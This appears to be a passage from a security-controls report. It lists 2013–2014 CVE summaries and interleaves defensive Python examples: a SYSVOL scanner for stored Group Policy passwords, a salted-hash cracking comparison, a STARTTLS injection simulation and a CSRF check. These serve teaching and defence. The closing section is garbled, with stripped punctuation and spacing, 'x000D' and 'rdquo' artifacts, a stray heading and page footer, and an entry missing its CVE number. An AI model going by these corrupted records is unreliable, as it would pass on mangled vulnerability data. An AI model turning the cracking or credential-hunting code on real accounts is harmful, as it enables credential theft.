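def scan_sysvol(root_dir):
    """Walk a mounted SYSVOL (or an offline copy) and scan every GPP file."""
    results = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name.lower() not in GPP_FILES:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                try:
                    results.extend(find_cpasswords(fh.read(), path))
                except ET.ParseError:
                    results.append({"source": path, "element": "<unparseable>",
                                    "account": "", "cpassword_len": -1})
    return results


# Constructed Groups.xml: a local administrator account set via GPP.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin" changed="2014-05-01 10:00:00">
    <Properties action="U" newName="" fullName="" description="constructed sample"
        cpassword="c29tZS1iYXNlNjQtYmxvYi1wbGFjZWhvbGRlcg" changeLogon="0"
        noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
"""

# Constructed Groups.xml with the password cleared: nothing to report.
SAMPLE_CLEAN_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="LocalAdmin">
    <Properties action="U" cpassword="" userName="LocalAdmin"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['source']}: <{f['element']}> account={f['account']!r} "
              f"cpassword of {f['cpassword_len']} chars")
```

Run `scan_sysvol(r"\\example.local\SYSVOL")` (or against a copied tree) from any domain-joined host; every finding is a credential to rotate, and the file itself should be deleted rather than edited, since the stored value remains recoverable from backups and replication history.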

CVE-2014-2014
imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103
Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109
The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554
OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742
Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768
Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 24 of 28

CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
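The CloudForms entry above is an instance of a general mistake: a salt baked into the code is the same for every account and every installation, so equal passwords produce equal stored values and a single table precomputed against that salt serves every user. The example below is added here and is not code from the report or from CloudForms; it uses PBKDF2 to put the two storage schemes side by side, with a deliberately small iteration count and a constructed user list and word list.

```python
"""Hard-coded salt versus per-user salt (added example, constructed data)."""
import hashlib
import os
from typing import Dict, Iterable, Optional, Tuple

ITERATIONS = 1000                   # kept low for the demo; production uses far more
FIXED_SALT = b"demo-hard-coded"     # the anti-pattern: one salt for everyone

# Constructed accounts: two users happen to share a password.
DEMO_USERS = {
    "alice": "Winter2014",
    "bob": "Winter2014",
    "carol": "correct horse battery staple",
}
WORDLIST = ("Password1", "Winter2014", "letmein")   # constructed guess list


def pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def store_fixed_salt(users: Dict[str, str]) -> Dict[str, bytes]:
    """What a hard-coded salt produces: same password -> identical stored value."""
    return {user: pbkdf2(pw, FIXED_SALT) for user, pw in users.items()}


def store_random_salt(users: Dict[str, str]) -> Dict[str, Tuple[bytes, bytes]]:
    """Per-user 16-byte random salt, stored alongside the hash."""
    out = {}
    for user, pw in users.items():
        salt = os.urandom(16)
        out[user] = (salt, pbkdf2(pw, salt))
    return out


def rainbow_table(candidates: Iterable[str], salt: bytes) -> Dict[bytes, str]:
    """Precompute hash -> password for one salt. The cost is paid once."""
    return {pbkdf2(c, salt): c for c in candidates}


def crack_fixed(stored: Dict[str, bytes],
                table: Dict[bytes, str]) -> Dict[str, Optional[str]]:
    """One table built for FIXED_SALT is reused against every account."""
    return {user: table.get(h) for user, h in stored.items()}


def crack_random(stored: Dict[str, Tuple[bytes, bytes]],
                 candidates: Iterable[str]) -> Dict[str, Optional[str]]:
    """With per-user salts each account needs its own table (or brute force),
    so the attacker's work grows linearly with the number of accounts."""
    candidates = list(candidates)
    return {user: rainbow_table(candidates, salt).get(h)
            for user, (salt, h) in stored.items()}


if __name__ == "__main__":
    fixed = store_fixed_salt(DEMO_USERS)
    print("fixed salt, alice == bob:", fixed["alice"] == fixed["bob"])
    print("one table cracks:", crack_fixed(fixed, rainbow_table(WORDLIST, FIXED_SALT)))
    random_store = store_random_salt(DEMO_USERS)
    print("random salt, alice == bob:", random_store["alice"][1] == random_store["bob"][1])
```

With the fixed salt the three accounts cost one table of three PBKDF2 calls; with per-user salts the same attack costs one table per account, and a table built for the hard-coded salt is useless against any of them.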

CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
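The nginx entry above is the general STARTTLS buffering mistake first written up for Postfix as CVE-2011-0411: if bytes that arrived in cleartext are still in the server's read buffer when the TLS handshake completes, the server executes them as though the client had sent them over TLS, so an on-path attacker who appends commands to the client's STARTTLS segment injects into the protected session. The simulation below is an added example, not nginx code: it models a line-based SMTP read loop in memory, with the vulnerable and fixed behaviours selected by a flag, and the socket reads are constructed.

```python
"""In-memory model of an SMTP server's read loop across STARTTLS.

Added example with constructed input; not nginx code. Everything the
server reads up to and including the chunk holding STARTTLS arrives in
cleartext (an on-path attacker can append to it); later chunks are what
the client sends inside TLS.
"""
from typing import List, Tuple

# Constructed segment as seen by the server: the client's EHLO and STARTTLS,
# with RSET and a MAIL FROM appended by an on-path attacker.
ATTACKER_SEGMENT = (b"EHLO client.example.net\r\n"
                    b"STARTTLS\r\n"
                    b"RSET\r\n"
                    b"MAIL FROM:<attacker@example.net>\r\n")

# Constructed data the real client sends after the handshake, inside TLS.
CLIENT_TLS_SEGMENT = b"MAIL FROM:<alice@example.net>\r\n"


def run_smtp_session(chunks: List[bytes],
                     discard_buffer_on_starttls: bool) -> List[Tuple[str, str]]:
    """Return (command, channel) pairs in the order the server executes them.

    channel is "plaintext" before the handshake and "tls" after it. With
    discard_buffer_on_starttls=False the server keeps whatever was already
    buffered (the vulnerable behaviour); with True it throws it away.
    """
    executed = []
    buf = b""
    tls = False
    for chunk in chunks:
        buf += chunk
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            cmd = line.decode("ascii", "replace").strip()
            executed.append((cmd, "tls" if tls else "plaintext"))
            if not tls and cmd.upper() == "STARTTLS":
                # The TLS handshake would run here. Bytes still in `buf` were
                # read from the cleartext socket; the fixed server drops them
                # so only data decrypted by the TLS layer is executed from now on.
                if discard_buffer_on_starttls:
                    buf = b""
                tls = True
    return executed


def injected_commands(executed: List[Tuple[str, str]]) -> List[str]:
    """Commands executed as 'tls' that the TLS client never sent."""
    client_sent = {"MAIL FROM:<alice@example.net>"}
    return [cmd for cmd, ch in executed if ch == "tls" and cmd not in client_sent]


if __name__ == "__main__":
    reads = [ATTACKER_SEGMENT, CLIENT_TLS_SEGMENT]
    print("vulnerable:", injected_commands(run_smtp_session(reads, False)))
    print("fixed:     ", injected_commands(run_smtp_session(reads, True)))
```

The same check applies to any STARTTLS-style upgrade (IMAP, POP3, XMPP, FTP AUTH TLS): after the handshake the server must start from an empty buffer, and clients should never pipeline data behind the STARTTLS command.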

CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114
Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132
Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481
Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631
RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528
The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040
GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105
IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136
IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164
IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363
vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378
Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487
Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250
The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927
The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945
OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447
Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638
The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
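The servers exposed by the sendBeacon bug above were those that treated a request with no Origin header as same-origin. The check below is an added example, not code from the report or from Mozilla, showing the server-side policy a practitioner wants: a present-but-wrong Origin or Referer is a hard reject, an absent one proves nothing, and a synchronizer token is required either way. SITE_ORIGIN, the header and form-field names, the session token and the sample requests are all assumptions.

```python
"""CSRF check that does not trust the absence of an Origin header.

Added example with constructed requests; SITE_ORIGIN and the field names
are assumed, not taken from any particular application.
"""
import hmac
from typing import Dict, Optional
from urllib.parse import urlsplit

SITE_ORIGIN = "https://app.example"        # assumed origin of the protected app
SESSION_TOKEN = "5f2d9c1e8a7b4c3d"         # constructed per-session token


def _header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def origin_of(url: str) -> str:
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}"


def origin_only_check(headers: Dict[str, str]) -> bool:
    """The pattern CVE-2014-8638 defeats: a missing Origin is taken as
    same-origin, so a beacon sent without the header sails through."""
    origin = _header(headers, "Origin")
    return origin is None or origin == SITE_ORIGIN


def check_csrf(headers: Dict[str, str], form: Dict[str, str],
               session_token: str) -> bool:
    """Accept a state-changing request only if it proves same-origin intent.

    1. Origin present and wrong (including "null")  -> reject.
    2. Origin absent, Referer present and wrong     -> reject.
    3. Otherwise the synchronizer token decides; headers alone never
       grant access, because browsers may omit both (sendBeacon here,
       Referer-stripping policies elsewhere).
    """
    origin = _header(headers, "Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False
    referer = _header(headers, "Referer")
    if origin is None and referer is not None and origin_of(referer) != SITE_ORIGIN:
        return False
    token = form.get("csrf_token", "")
    return hmac.compare_digest(token, session_token)


if __name__ == "__main__":
    beacon = ({}, {"action": "delete_account"})   # no Origin, no token
    print("origin-only check lets the beacon through:", origin_only_check(beacon[0]))
    print("token check rejects it:", not check_csrf(beacon[0], beacon[1], SESSION_TOKEN))
```

The token comparison uses hmac.compare_digest so that a wrong token costs the same time as a nearly right one; the token itself should be generated per session with a CSPRNG (secrets.token_hex in Python) and never placed in a URL.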

CVE-2014-8835
The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159
Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163
Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350
TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses


Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826
WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920
The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com/ substring.

CVE-2013-3064
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116
Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137
Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280
EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387
Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417
The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632
The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656
Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856
Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860
Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893
Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897
Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo

CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo

CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile

CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack

CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment

CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image

CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors

CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem

CVE-2013-4782

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28

The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password

CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo

CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service

CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors

